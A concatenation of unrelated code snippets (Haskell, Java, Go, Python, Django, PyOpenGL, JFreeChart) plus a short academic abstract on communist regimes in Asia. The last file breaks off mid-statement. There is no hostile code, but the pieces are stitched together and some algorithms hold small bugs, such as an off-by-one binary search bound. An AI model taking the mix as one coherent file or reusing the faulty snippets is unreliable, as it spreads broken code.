(Endo (e:)) (Right ()) data WeedError a = WeedError a String deriving (Show) instance Functor WeedError where fmap f (WeedError a s) = WeedError (f a) s errorWith :: a -> String -> WeedError a errorWith = WeedError {- Megaparsec compatibility -} defaultPosState :: FilePath -> s -> PosState s defaultPosState filename input = PosState { pstateInput = input , pstateOffset = 0 , pstateSourcePos = initialPos filename , pstateTabWidth = defaultTabWidth , pstateLinePrefix = "" } asParseErrors :: Weed (WeedError Int) a -> Weed (ParseError s e) a asParseErrors = transformErrors toParseError where toParseError (WeedError offset msg) = FancyError offset $ Set.singleton $ ErrorFail msg runWeedBundle :: FilePath -> s -> Weed (ParseError s e) a -> Either (ParseErrorBundle s e) a runWeedBundle filename input w = case runWeed w of Left errors -> Left $ ParseErrorBundle errors $ defaultPosState filename input Right a -> Right a
<reponame>gacsoft/hiddenjournal<gh_stars>0 package com.gacsoft.hiddenjournal; import android.app.AlertDialog; import android.content.DialogInterface; import android.support.v7.app.AppCompatActivity; import android.os.Bundle; import android.view.View; import android.widget.AdapterView; import android.widget.ArrayAdapter; import android.widget.ListAdapter; import android.widget.ListView; import android.widget.Toast; import java.util.ArrayList; public class ConfigActivity extends AppCompatActivity { private int id = -1; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_config); setTitle(R.string.options); ListView listView = (ListView) findViewById(R.id.list_view); listView.setOnItemClickListener(new AdapterView.OnItemClickListener() { @Override public void onItemClick(AdapterView<?> adapterView, View view, int position, long l) { id = position + 1; // ListView position starts from 0, backup id starts from 1 itemClicked(); } }); } public void onResume() { super.onResume(); ListView listView = (ListView)findViewById(R.id.list_view); ListAdapter listAdapter = new ArrayAdapter<String>(this, R.layout.entry_list_view, BackupManager.getBackupList()); listView.setAdapter(listAdapter); } private void itemClicked() { new AlertDialog.Builder(this) .setTitle(R.string.loadBackup) .setMessage(R.string.confirmBackup) .setIcon(android.R.drawable.ic_dialog_alert) .setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { loadBackup(); }}) .setNegativeButton(android.R.string.no, null) .show(); } private void loadBackup() { try { System.out.println(id); BackupManager.loadBackup(id); Toast.makeText(ConfigActivity.this, R.string.doneBackup, Toast.LENGTH_SHORT).show(); } catch (java.io.IOException e) { Toast.makeText(ConfigActivity.this, R.string.failedBackup, Toast.LENGTH_SHORT).show(); } } }
<gh_stars>0 package factory import ( "designpattern-factorymethod-golang/product" concrete "designpattern-factorymethod-golang/product/impl" "fmt" ) func GetTransportType(quPassengers int) (product.ITransport, error) { if quPassengers >= 1 && quPassengers <=5 { return concrete.NewTaxi(), nil } if quPassengers >= 6 && quPassengers <=15 { return concrete.NewVan(), nil } if quPassengers >=16 { return concrete.NewBus(), nil } return nil, fmt.Errorf("wrong quantity of passengers") }
def untransform_target(self, mix, predicted_mask, index): mix_slice = [self.chopper.chop_n_pad( channel, index, self.size) for channel in mix] mix_magnitude = np.abs(mix_slice) predicted_mask = np.clip(predicted_mask, 0, 1) predicted_mask_reshape = [predicted_mask[:, :, 0]] if self.stereo: predicted_mask_reshape.append(predicted_mask[:, :, 1]) vocal_magnitude = mix_magnitude * predicted_mask_reshape vocals = vocal_magnitude * np.exp(np.angle(mix_slice) * 1j) return vocals, mix_slice - vocals
def MakePulseDataRep(pulse_shape, filt_freq, delay=16, rep=1, numtype = sp.complex128): npts = len(filt_freq) multforimag = sp.ones_like(filt_freq) hpnt = int(sp.ceil(npts/2.)) multforimag[hpnt:] =- 1 tmp = scfft.ifft(filt_freq) tmp[hpnt:] = 0. filt_tile = sp.tile(filt_freq[sp.newaxis,:], (rep, 1)) shaperep = sp.tile(pulse_shape[sp.newaxis,:], (rep, 1)) noisereal = sp.random.randn(rep, npts).astype(numtype) noiseimag = sp.random.randn(rep, npts).astype(numtype) noise_vec = (noisereal+1j*noiseimag)/sp.sqrt(2.0) mult_freq = filt_tile.astype(numtype)*noise_vec data = scfft.ifft(mult_freq, axis=-1) data_out = shaperep*data[:, delay:(delay+len(pulse_shape))] return data_out
package com.zlz.util; import java.util.*; public class UtilAlg { public static String getHint(String secret, String guess) { int bulls = 0; int cows = 0; int[] numbers = new int[10]; for (int i = 0; i < secret.length(); i++) { int s = secret.charAt(i) - '0'; int g = guess.charAt(i) - '0'; if (s == g) bulls++; else { //当前数小于 0, 说明之前在 guess 中出现过, 和 secret 当前的数匹配 if (numbers[s] < 0) cows++; //当前数大于 0, 说明之前在 secret 中出现过, 和 guess 当前的数匹配 if (numbers[g] > 0) cows++; //secret 中的数, 计数加 1 numbers[s]++; //guess 中的数, 计数减 1 numbers[g]--; } } return bulls + "A" + cows + "B"; } public static void main(String[] args) { System.out.println("keep Happy boy"); PrintUtil.pLine(); System.out.println(getHint("232", "321")); } // public static String getHint(String secret, String guess) { // int len = secret.length(); // int[] secretarr = new int[10]; // int[] guessarr = new int[10]; // int bull = 0, cow = 0; // for (int i = 0; i < len; ++i) { // if (secret.charAt(i) == guess.charAt(i)) { // ++bull; // } else { // ++secretarr[secret.charAt(i) - '0']; // ++guessarr[guess.charAt(i) - '0']; // } // } // for (int i = 0; i < 10; ++i) { // cow += Math.min(secretarr[i], guessarr[i]); // } // return "" + bull + "A" + cow + "B"; // } public static int findPositionToReplace(int[] a, int low, int high, int x) { int mid; while (low <= high) { mid = low + (high - low) / 2; if (a[mid] == x) return mid; else if (a[mid] > x) high = mid - 1; else low = mid + 1; } return low; } public static int lengthOfLIS(int[] nums) { if (nums == null | nums.length == 0) return 0; int n = nums.length, len = 0; int[] increasingSequence = new int[n]; increasingSequence[len++] = nums[0]; for (int i = 1; i < n; i++) { if (nums[i] > increasingSequence[len - 1]) increasingSequence[len++] = nums[i]; else { int position = findPositionToReplace(increasingSequence, 0, len - 1, nums[i]); increasingSequence[position] = nums[i]; } } return len; } public static int lengthOfLIS1(int[] nums) { int[] dp = new int[nums.length]; Arrays.fill(dp, 1); int result1 = solve(nums, 0, Integer.MIN_VALUE); int result2 = solve(nums, dp); if (result1 != result2) { System.out.println(result1 + " " + result2); } return result1; } private static int solve(int[] nums, int[] dp) { int ans = 1, n = nums.length; for (int i = 0; i < n; i++) for (int j = 0; j < i; j++) if (nums[i] > nums[j]) { dp[i] = Math.max(dp[i], dp[j] + 1); ans = Math.max(ans, dp[i]); } return ans; } public static int solve(int[] nums, int i, int prev) { if (i >= nums.length) return 0; int take = 0, dontTake = solve(nums, i + 1, prev); // try skipping the current element if (nums[i] > prev) take = 1 + solve(nums, i + 1, nums[i]); // or pick it if it is greater than previous picked element int result = Math.max(take, dontTake); // return whichever choice gives max LIS return result; } public static void test_restoreIpAddresses(String[] args) { System.out.println("keep Happy boy"); System.out.println(restoreIpAddresses("25525511135")); } public static List<String> restoreIpAddresses(String input) { List<String> result = new ArrayList<>(); backtracking(input, 0, result, new StringBuilder(), 0); return result; } private static void backtracking(String input, int i, List<String> result, StringBuilder stringBuilder, int index) { if (index > 5) return; if (i > input.length() && index < 4) return; if (i == input.length() && index == 4) { result.add(stringBuilder.toString().substring(0, stringBuilder.toString().length() - 1)); } for (int k = 1; k < 4; k++) { if (i + k > input.length()) return; String value = input.substring(i, i + k); if (validate(value, i)) { stringBuilder.append(value); stringBuilder.append("."); backtracking(input, i + k, result, stringBuilder, index + 1); int length = stringBuilder.length(); stringBuilder.delete(length - value.length() - 1, length); } else { return; } } } private static boolean validate(String value, int index) { if (index == 0 && value.startsWith("0")) return false; Integer v = Integer.parseInt(value); if (v < 0 || v > 255) return false; return true; } public static void test_subsetsWithDup(String[] args) { System.out.println("keep Happy boy"); System.out.println(subsetsWithDup(new int[]{1, 2, 3})); System.out.println(subsetsWithDup(new int[]{1, 2, 2})); } /** * 还是需要遵守我们规划出来的步骤 * 1. 确认输入,输出: * 【1,2,2】 * [[],[1],[1,2],[1,2,2],[2],[2,2]] * 2. 规律化 * 1,2,2 * [] * 1|2 * 1,2|2,2 * 1,2,2 */ public static List<List<Integer>> subsetsWithDup(int[] nums) { List<List<Integer>> result = new ArrayList<>(); for (int i = 0; i <= nums.length; i++) { subsetsWithDup(nums, 0, i, result, new ArrayList<Integer>()); } return result; } private static void subsetsWithDup(int[] nums, int i, int k, List<List<Integer>> result, ArrayList<Integer> es) { if (es.size() == k) { result.add(new ArrayList<>(es)); return; } else { for (int j = i; j < nums.length; j++) { if (j > i && nums[j - 1] == nums[j]) continue; es.add(nums[j]); subsetsWithDup(nums, j + 1, k, result, es); es.remove(es.size() - 1); } } } public static void test_grayCode(String[] args) { System.out.println("keep Happy boy"); System.out.println(grayCode(3)); } /** * backtring 没有错,但是BitSet 这个数据结构,不太熟悉,这也是一个学的点 */ public static List<Integer> grayCode(int n) { List<Integer> res = new ArrayList<>(); return helper(res, n, new BitSet()); } private static List<Integer> helper(List<Integer> res, int n, BitSet chosen) { if (n == 0) { // all bits of chosen have been selected Integer va = convert(chosen); res.add(va); } else { helper(res, n - 1, chosen); chosen.flip(n - 1); helper(res, n - 1, chosen); } return res; } public static int convert(BitSet bits) { int value = 0; for (int i = 0; i < bits.length(); ++i) { value += bits.get(i) ? (1L << i) : 0L; } return value; } public static void test_exist(String[] args) { System.out.println("keep Happy boy"); char[][] v = PrintUtil.costructCharArray("[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]"); System.out.println(exist(v, "ABCCEDA")); System.out.println(exist(v, "ABCCED")); v = PrintUtil.costructCharArray("[[\"a\",\"b\"],[\"c\",\"d\"]]"); System.out.println(exist(v, "acdb")); v = PrintUtil.costructCharArray("[[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]]"); System.out.println(exist(v, "AAB")); } /** * 变形的backtracking,首先画图 * ["A","B","C","E"], * ["S","F","C","S"], * ["A","D","E","E"] * <p> * ABCCED * <p> * begine:开始的回溯的条件是什么?限定的剪枝条件是什么? * <p> * [a,b] * [c,d] * <p> * acdb * <p> * [["C","A","A"], * ["A","A","A"], * ["B","C","D"] * <p> * AAB */ public static boolean exist(char[][] board, String word) { boolean[][] visite = new boolean[board.length][board[0].length]; for (int i = 0; i < board.length; i++) { for (int j = 0; j < board[0].length; j++) { if (exist(board, i, j, word, 0, visite)) return true; } } return false; } private static boolean exist(char[][] board, int i, int j, String word, int i1, boolean[][] visite) { if (word.charAt(i1) == board[i][j]) { if (i1 == word.length() - 1) { return true; } else { visite[i][j] = true; if (j < board[0].length - 1 && !visite[i][j + 1] && exist(board, i, j + 1, word, i1 + 1, visite)) return true; if (i < board.length - 1 && !visite[i + 1][j] && exist(board, i + 1, j, word, i1 + 1, visite)) return true; if (j > 0 && !visite[i][j - 1] && exist(board, i, j - 1, word, i1 + 1, visite)) return true; if (i > 0 && !visite[i - 1][j] && exist(board, i - 1, j, word, i1 + 1, visite)) return true; visite[i][j] = false; } } return false; } public static void test_subsets(String[] args) { System.out.println("keep Happy boy"); System.out.println(subsets(new int[]{1, 2, 3})); System.out.println(subsets(new int[]{1})); } /** * nums = [1,2,3] * k=0, [] * k=1, 1,2,3 * k=2, 1,2|1,3|2,3 * k=3, 1,2,3 */ public static List<List<Integer>> subsets(int[] nums) { List<List<Integer>> result = new ArrayList<>(); for (int i = 0; i <= nums.length; i++) { subsets(nums, 0, i, result, new HashSet<Integer>()); } return result; } private static void subsets(int[] nums, int i, int k, List<List<Integer>> result, HashSet<Integer> es) { if (es.size() == k) { result.add(new ArrayList<>(es)); return; } else { for (int j = i; j < nums.length; j++) { es.add(nums[j]); subsets(nums, j + 1, k, result, es); es.remove(nums[j]); } } } public static void test_combine(String[] args) { System.out.println("keep Happy boy"); List<List<Integer>> resul = combine(4, 2); PrintUtil.p(resul); } /** * 最标准的一个递归迭代 * 1,2 | 1,3| 1,4 * 2,3,| 2,3 * 3,4 */ public static List<List<Integer>> combine(int n, int k) { List<List<Integer>> result = new ArrayList<>(); combine(n, 1, k, result, new HashSet<Integer>()); return result; } private static void combine(int n, int i, int k, List<List<Integer>> result, HashSet<Integer> integers) { if (integers.size() == k) { result.add(new ArrayList<>(integers)); return; } else { for (int j = i; j <= n; j++) { integers.add(j); combine(n, j + 1, k, result, integers); integers.remove(j); } } } public static void test_minWindow(String[] args) { System.out.println("keep Happy boy"); System.out.println(minWindow("ADOBCAODEBANC", "ABC")); System.out.println(minWindow("ADOBECODEBANC", "ABC")); } /** * 我们迫切的需要考虑的是,窗口的维护 * 如果我们,碰到第一个匹配的时候,我们直接把我们设置的Map清空以后,再次的开始 * 这样的话,我们就放弃了,前面匹配的内容,就不能够平滑的滑动,只是在跳跃的匹配,这样不合题目中的要求 * <p> * 现在我们面临的问题是,如果确定窗口的滑动过程中的更新,我们可以列出来,我们已经知晓的内容: */ public static String minWindow(String s, String t) { if (s.isEmpty() || t.isEmpty()) return ""; Map<Character, Integer> need = new HashMap<>(); t.chars().forEach(e -> need.put((char) e, need.getOrDefault((char) e, 0) + 1)); int i = 0, j = 0, l = 0, r = 0, missing = t.length(); while (r < s.length()) { char right = s.charAt(r); need.putIfAbsent(right, -1); // 这个判定的条件非常的厉害:维护窗口的滑动的条件 if (need.get(right) > 0) { missing -= 1; } need.put(right, need.get(right) - 1); r += 1; while (missing == 0) {//窗口的维护,尽量的找到 if (j == 0 || (r - l) < (j - i)) { j = r; i = l; } char left = s.charAt(l); need.putIfAbsent(left, -1); need.put(left, need.get(left) + 1); if (need.get(left) > 0) missing += 1; l += 1; } } return s.substring(i, j); } public static void test_sortColors(String[] args) { System.out.println("keep Happy boy"); int[] a = PrintUtil.constractArray(3, 10, false); PrintUtil.p(Arrays.toString(a)); sortColors(a); PrintUtil.p(Arrays.toString(a)); a = new int[]{0}; sortColors(a); PrintUtil.p(Arrays.toString(a)); a = new int[]{1}; sortColors(a); PrintUtil.p(Arrays.toString(a)); a = new int[]{1, 0}; sortColors(a); PrintUtil.p(Arrays.toString(a)); } public static void sortColors(int[] nums) { int f0 = 0, e2 = nums.length - 1; for (int i = 0; i < nums.length; ) { //0,2 if (nums[i] == 2 && i < e2) { change(i, e2, nums); e2--; } else if (nums[i] == 0 && i > f0) { change(i, f0, nums); f0++; } else { i++; } } } private static void change(int i, int e2, int[] nums) { int tmp = nums[i]; nums[i] = nums[e2]; nums[e2] = tmp; } public static void test_searchMatrix(String[] args) { System.out.println("keep Happy boy"); int[] a = PrintUtil.constractArray(10); PrintUtil.p(Arrays.toString(a)); Arrays.sort(a); PrintUtil.p(Arrays.toString(a)); System.out.println(findByDivedMethod(a, 45)); int[][] tes = PrintUtil.costructIntArray("[[1,1]]"); System.out.println(searchMatrix(tes, 2)); } public static int findByDivedMethod(int[] a, int target) { int f = 0, end = a.length; while (f <= end) { int mid = f + (end - f) / 2; if (a[mid] == target) { return mid; } else if (a[mid] > target) { end = mid - 1; } else { f = mid + 1; } } return -1; } public static boolean searchMatrix(int[][] matrix, int target) { int f = 0, end = matrix[0].length * matrix.length - 1; while (f <= end) { int mid = f + (end - f) / 2; if (matrix[mid / matrix[0].length][mid % matrix[0].length] == target) { return true; } else if (matrix[mid / matrix[0].length][mid % matrix[0].length] > target) { end = mid - 1; } else { f = mid + 1; } } return false; } }
Introduction to the Special Issue on Authoritarian Resilience of Communist Regimes in Asia This special issue focuses on the resilience of the communist regimes in Laos, Cambodia, Vietnam, and China. Three decades after the collapse of the Soviet Bloc, all four not only survived a hostile post-communist world dominated by liberal capitalism but have thrived economically. The five articles in this special issue hope to build on existing scholarship on authoritarian resilience while contributing in the following ways. First, by adopting a regional framework, we hope to offer a fuller examination of varieties in communist Asia. After all, this is the only world region with such a large concentration of surviving communist parties. Second, while highlighting the critical role of revolutionary origins, our approach corrects the tendency in scholarship on democratic transition that neglects the totalitarian legacies. Third, the articles support the institutionalist approach by showing how ruling parties in authoritarian regimes are critical; yet we also seek to balance between historical legacies and contemporary developments and to analyze the interactions among ideologies, organizations, and resources.
def constructFunction( self, functionName, dll, resultType=ctypes.c_int, argTypes=(), doc = None, argNames = (), extension = None, deprecated = False, module = None, force_extension = False, error_checker = None, ): is_core = (not extension) or extension.split('_')[1] == 'VERSION' if (not is_core) and not self.checkExtension( extension ): raise AttributeError( """Extension not available""" ) argTypes = [ self.finalArgType( t ) for t in argTypes ] if force_extension or ((not is_core) and (not self.EXTENSIONS_USE_BASE_FUNCTIONS)): pointer = self.getExtensionProcedure( as_8_bit(functionName) ) if pointer: func = self.functionTypeFor( dll )( resultType, *argTypes )( pointer ) else: raise AttributeError( """Extension %r available, but no pointer for function %r"""%(extension,functionName)) else: func = ctypesloader.buildFunction( self.functionTypeFor( dll )( resultType, *argTypes ), functionName, dll, ) func.__doc__ = doc func.argNames = list(argNames or ()) func.__name__ = functionName func.DLL = dll func.extension = extension func.deprecated = deprecated func = self.wrapLogging( self.wrapContextCheck( self.errorChecking( func, dll, error_checker=error_checker ), dll, ) ) if MODULE_ANNOTATIONS: if not module: module = _find_module( ) if module: func.__module__ = module return func
package org.jdesktop.swingx.search; import java.awt.event.ActionListener; import java.beans.PropertyChangeEvent; import javax.swing.JPopupMenu; import javax.swing.JTextField; import javax.swing.UIManager; import org.jdesktop.swingx.plaf.AbstractUIChangeHandler; import org.jdesktop.swingx.util.OS; /** * TODO: comment * * @author Peter Weishapl <[email protected]> */ public class NativeSearchFieldSupport { public static final String FIND_POPUP_PROPERTY = "JTextField.Search.FindPopup"; public static final String FIND_ACTION_PROPERTY = "JTextField.Search.FindAction"; public static final String MAC_SEARCH_VARIANT = "search"; public static final String MAC_TEXT_FIELD_VARIANT_PROPERTY = "JTextField.variant"; public static final String CANCEL_ACTION_PROPERTY = "JTextField.Search.CancelAction"; /** * @return <code>true</code> if we run Leopard and the Mac Look And Feel. */ public static boolean isNativeSearchFieldSupported() { try { String versionString = System.getProperty("os.version"); // Mac versions have the format 10.x or 10.x.x if (versionString.length() < 4) { return false; } // only the part 10.x is important versionString = versionString.substring(0, 4); return OS.isMacOSX() && Float.parseFloat(versionString) >= 10.5 && UIManager.getLookAndFeel().getName().equals("Mac OS X"); } catch (Exception e) { // in case the os.version cannot be parsed, we are surely not // running mac os x. return false; } } public static void setSearchField(JTextField txt, boolean isSearchField) { // Leopard Hack: ensure property change event is triggered, if nothing // changes. if (isSearchField == isSearchField(txt)) { txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, "_triggerevent_"); } else if (isSearchField) { // if we have a search field here, register listener for ui changes // (leopard hack) uiChangeHandler.install(txt); } else { // if we don't have a search field, we don't need to listen anymore. uiChangeHandler.uninstall(txt); } if (isSearchField) { txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, MAC_SEARCH_VARIANT); txt.putClientProperty("Quaqua.TextField.style", MAC_SEARCH_VARIANT); } else { txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, "default"); txt.putClientProperty("Quaqua.TextField.style", "default"); } } public static boolean isSearchField(JTextField txt) { return MAC_SEARCH_VARIANT.equals(txt.getClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY)); } public static boolean isNativeSearchField(JTextField txt) { return isSearchField(txt) && isNativeSearchFieldSupported(); } public static void setFindPopupMenu(JTextField txt, JPopupMenu popupMenu) { txt.putClientProperty(FIND_POPUP_PROPERTY, popupMenu); } public static JPopupMenu getFindPopupMenu(JTextField txt) { return (JPopupMenu) txt.getClientProperty(FIND_POPUP_PROPERTY); } public static void setFindAction(JTextField txt, ActionListener findAction) { txt.putClientProperty(FIND_ACTION_PROPERTY, findAction); } public static ActionListener getFindAction(JTextField txt) { return (ActionListener) txt.getClientProperty(FIND_ACTION_PROPERTY); } public static void setCancelAction(JTextField txt, ActionListener cancelAction) { txt.putClientProperty(CANCEL_ACTION_PROPERTY, cancelAction); } public static ActionListener getCancelAction(JTextField txt) { return (ActionListener) txt.getClientProperty(CANCEL_ACTION_PROPERTY); } private static final SearchFieldUIChangeHandler uiChangeHandler = new SearchFieldUIChangeHandler(); private static final class SearchFieldUIChangeHandler extends AbstractUIChangeHandler { @Override public void propertyChange(PropertyChangeEvent evt) { JTextField txt = (JTextField) evt.getSource(); // Leopard hack to make appear correctly in search variant when // changing LnF. setSearchField(txt, isSearchField(txt)); } } }
package osmedile.intellij.stringmanip.styles; public class ToHyphenCaseAction extends AbstractCaseConvertingAction { public ToHyphenCaseAction() { } public ToHyphenCaseAction(boolean b) { super(b); } @Override public String transformByLine(String s) { Style from = Style.from(s); if (from == Style.HYPHEN_LOWERCASE) { return Style.UNDERSCORE_LOWERCASE.transform(from, s); } return Style.HYPHEN_LOWERCASE.transform(from, s); } }
<gh_stars>0 import xxhash from django.apps import apps from django.conf import settings from django.core.exceptions import ValidationError from django.utils.translation import ugettext as _ __all__ = ('get_hash', 'get_photo_relations', 'validate_photo_file', 'serialize_photo', 'default_photo_serializer') def get_hash(input): h = xxhash.xxh32() h.update(input) return h.hexdigest() def get_photo_relations(): from .fields import PhotoField, ManyPhotosField, SortableManyPhotosField models_with_photos = [] for model_cls in apps.get_models(): for field in model_cls._meta.get_fields(): if isinstance(field, (PhotoField, ManyPhotosField, SortableManyPhotosField)): models_with_photos.append((model_cls, field)) return models_with_photos def validate_photo_file(file): if not file.content_type.startswith('image/'): raise ValidationError(_('Invalid file type')) if file.size > settings.PHOTOSLIB_MAX_SIZE: raise ValidationError(_('Too big file size')) def default_photo_serializer(photo, request=None): build_absolute_uri = request.build_absolute_uri if request is not None else lambda x: x return { 'id': photo.id, 'file': build_absolute_uri(photo.file.url), 'thumb': build_absolute_uri(getattr(photo, settings.PHOTOSLIB_THUMB_FIELD).url), 'sizes': dict({ size: build_absolute_uri(getattr(photo, size).url) for size in settings.PHOTOSLIB_PHOTO_SIZES.keys() }), } def serialize_photo(photo, request=None): if callable(settings.PHOTOSLIB_PHOTO_SERIALIZE_HANDLER): return settings.PHOTOSLIB_PHOTO_SERIALIZE_HANDLER(photo, request=request) return default_photo_serializer(photo, request=request)
/** * A data panel to plot data time series and xy charts. * * @author Jason P. Hanley * @author Drew Daugherty */ public abstract class ChartViz extends AbstractDataPanel { /** * The logger for this class. */ static Log log = LogFactory.getLog(ChartViz.class.getName()); /** the data panel property to control the legend visibility */ private static final String DATA_PANEL_PROPERTY_SHOW_LEGEND = "showLegend"; private static final double ADJUST_TIME_SCALE_TIMEOUT_SEC=2.0; /** * The chart. */ JFreeChart chart; /** * The xy plot for this chart. */ XYPlot xyPlot; /** * The domain (horizontal) axis that contains a value. This will be a number * axis for an xy plot or a date axis for a timeseries plot. */ ValueAxis domainAxis; /** * The range (vertical) axis that contains a number. */ NumberAxis rangeAxis; /** * The component that renderers the chart. */ ChartPanel chartPanel; /** * The data set for the chart. */ XYDataset dataCollection; /** * The legend for the series in the chart. */ LegendTitle seriesLegend; /** * The container for the chart component. */ JPanel chartPanelPanel; /** * A bit to indicate if we are plotting time series charts of x vs. y charts. */ final boolean xyMode; /** * The timestamp for the last piece if data displayed. */ long lastDataPostSysTime=-1; /** * The number of local data series. */ int localSeries; /** * Data start time for the current post operation. */ double postDataStartTime=Double.MAX_VALUE; /** * Data end time for the current post operation. */ double postDataEndTime=0.0; /** * Data record count for the current post operation. */ long postDataCount=0L; /** * Plot colors for each series. */ HashMap<String,Color> colors; /** * Colors used for the series. */ final static Color[] seriesColors = {Color.decode("#FF0000"), Color.decode("#0000FF"), Color.decode("#009900"), Color.decode("#FF9900"), Color.decode("#9900FF"), Color.decode("#FF0099"), Color.decode("#0099FF"), Color.decode("#990000"), Color.decode("#000099"), Color.black}; /** a flag to control the legend visibility, defaults to true */ private boolean showLegend; /** * Constructs a chart data panel in time series mode. */ public ChartViz() { this(false); } /** * Constructs a chart data panel. * * @param xyMode if true in x vs. y mode, otherwise in time series mode */ public ChartViz(boolean xyMode) { super(); this.xyMode = xyMode; //lastTimeDisplayed = -1; colors = new HashMap<String,Color>(); // show the legend by default showLegend = true; initChart(); setDataComponent(chartPanelPanel); } /** * Create the chart and setup it's UI. */ private void initChart() { XYToolTipGenerator toolTipGenerator; if (xyMode) { dataCollection = new XYTimeSeriesCollection(); NumberAxis domainAxis = new NumberAxis(); domainAxis.setAutoRangeIncludesZero(false); domainAxis.addChangeListener(new AxisChangeListener() { public void axisChanged(AxisChangeEvent ace) { boundsChanged(); } }); this.domainAxis = domainAxis; toolTipGenerator = new StandardXYToolTipGenerator("{0}: {1} , {2}", new DecimalFormat(), new DecimalFormat()); } else { dataCollection = new TimeSeriesCollection(); domainAxis = new FixedAutoAdjustRangeDateAxis(); domainAxis.setLabel("Time"); domainAxis.setAutoRange(false); toolTipGenerator = new StandardXYToolTipGenerator("{0}: {1} , {2}", new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS"), new DecimalFormat()); } rangeAxis = new NumberAxis(); rangeAxis.setAutoRangeIncludesZero(false); rangeAxis.addChangeListener(new AxisChangeListener() { public void axisChanged(AxisChangeEvent ace) { boundsChanged(); } }); FastXYItemRenderer renderer = new FastXYItemRenderer(StandardXYItemRenderer.LINES, toolTipGenerator); //SamplingXYLineRenderer renderer = new SamplingXYLineRenderer(); //renderer.setToolTipGenerator(toolTipGenerator); //renderer.setShapeSize(0); renderer.setBaseCreateEntities(false); renderer.setBaseStroke(new BasicStroke(0.5f)); Rectangle rect = new Rectangle(0,0,5,5); renderer.setLegendLine(rect); if (xyMode) { renderer.setCursorVisible(true); } xyPlot = new XYPlot(dataCollection, domainAxis, rangeAxis, renderer); chart = new JFreeChart(xyPlot); chart.setAntiAlias(false); //chart.setAntiAlias(true); seriesLegend = chart.getLegend(); chart.removeLegend(); chartPanel = new ChartPanel(chart, true, this); chartPanel.setInitialDelay(0); chartPanelPanel = new JPanel(); chartPanelPanel.setLayout(new BorderLayout()); chartPanelPanel.add(chartPanel, BorderLayout.CENTER); } @Override public void buildPopupMenu(JPopupMenu menu, MouseEvent e){ super.buildPopupMenu(menu, e); ActionListener setTimerangeAction = new ActionListener() { public void actionPerformed(ActionEvent ae) { double newScale =Double.parseDouble(ae.getActionCommand()); setLocalTimescale(newScale); } }; // regenerate new menu JMenu timeRangeMenu = new JMenu("Set Timerange"); ButtonGroup timeRangeGroup = new ButtonGroup(); JRadioButtonMenuItem range = new JRadioButtonMenuItem( TimeScale.TIME_SCALE_UNDEFINED_DESC); range.setActionCommand(String.valueOf(TimeScale.TIME_SCALE_UNDEFINED)); range.addActionListener(setTimerangeAction); timeRangeGroup.add(range); timeRangeMenu.add(range); if (localTimeScale_ == TimeScale.TIME_SCALE_UNDEFINED) range.setSelected(true); Double timeScales[]=TimeScale.getGlobalTimeScales(); for (int i=0;i<timeScales.length;i++) { range = new JRadioButtonMenuItem( DataViewer.formatSeconds(timeScales[i])); range.setActionCommand(String.valueOf(timeScales[i])); range.addActionListener(setTimerangeAction); timeRangeGroup.add(range); timeRangeMenu.add(range); if (localTimeScale_ == timeScales[i]) range.setSelected(true); } menu.add(timeRangeMenu); // create a popup menu item to copy an image to the clipboard final JMenuItem copyChartMenuItem = new JMenuItem("Copy"); copyChartMenuItem.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent arg0) { copyChart(); } }); menu.add(copyChartMenuItem); //menu.insert(new JPopupMenu.Separator(), 3); menu.add(new JPopupMenu.Separator()); // Clear Data from the chart - Thomas Marullo 9/24/09 final JMenuItem clearChartMenuItem = new JMenuItem("Clear Data"); clearChartMenuItem.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent arg0) { SwingUtilities.invokeLater(new Runnable() { public void run() { clearData(); } }); } }); menu.add(clearChartMenuItem, 2); // End Clear Data JMenuItem showLegendMenuItem = new JCheckBoxMenuItem("Show Legend", showLegend); showLegendMenuItem.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent ae) { setShowLegend(!showLegend); } }); menu.add(showLegendMenuItem); if (xyMode) { menu.add(new JPopupMenu.Separator()); JMenuItem addLocalSeriesMenuItem = new JMenuItem("Add local series..."); addLocalSeriesMenuItem.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent ae) { addLocalSeries(); } }); menu.add(addLocalSeriesMenuItem); } chartPanel.buildPopupMenu(menu,e); } /** * Takes the chart and puts it on the clipboard as an image. */ private void copyChart() { // get the system clipboard Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard(); // create an image of the chart with the preferred dimensions Dimension preferredDimension = chartPanel.getPreferredSize(); Image image = chart.createBufferedImage((int)preferredDimension.getWidth(), (int)preferredDimension.getHeight()); // wrap image in the transferable and put on the clipboard ImageSelection contents = new ImageSelection(image); clipboard.setContents(contents, null); } /** * Add data from a local file as a series to this chart. This will ask the * user for the file name, and which channels to use. */ private void addLocalSeries() { File file = UIUtilities.openFile(); if (file == null || !file.isFile() || !file.exists()) { return; } DataFileReader reader; try { reader = new DataFileReader(file); } catch (IOException e) { JOptionPane.showMessageDialog(getDataComponent(), e.getMessage(), "Problem reading data file", JOptionPane.ERROR_MESSAGE); return; } List<Channel> channels = reader.getChannels(); if (channels.size() < 2) { JOptionPane.showMessageDialog(getDataComponent(), "There must be at least 2 channels in the data file", "Problem with data file", JOptionPane.ERROR_MESSAGE); return; } Channel xChannel; Channel yChannel; if (channels.size() == 2) { xChannel = channels.get(0); yChannel = channels.get(1); } else { xChannel = (Channel)JOptionPane.showInputDialog( getDataComponent(), "Select the x channel:", "Add local channel", JOptionPane.PLAIN_MESSAGE, null, channels.toArray(), null); if (xChannel == null) { return; } yChannel = (Channel)JOptionPane.showInputDialog( getDataComponent(), "Select the y channel:", "Add local channel", JOptionPane.PLAIN_MESSAGE, null, channels.toArray(), null); if (yChannel == null) { return; } } String xChannelName = xChannel.getName(); if (xChannel.getUnit() != null) { xChannelName += " (" + xChannel.getUnit() + ")"; } int 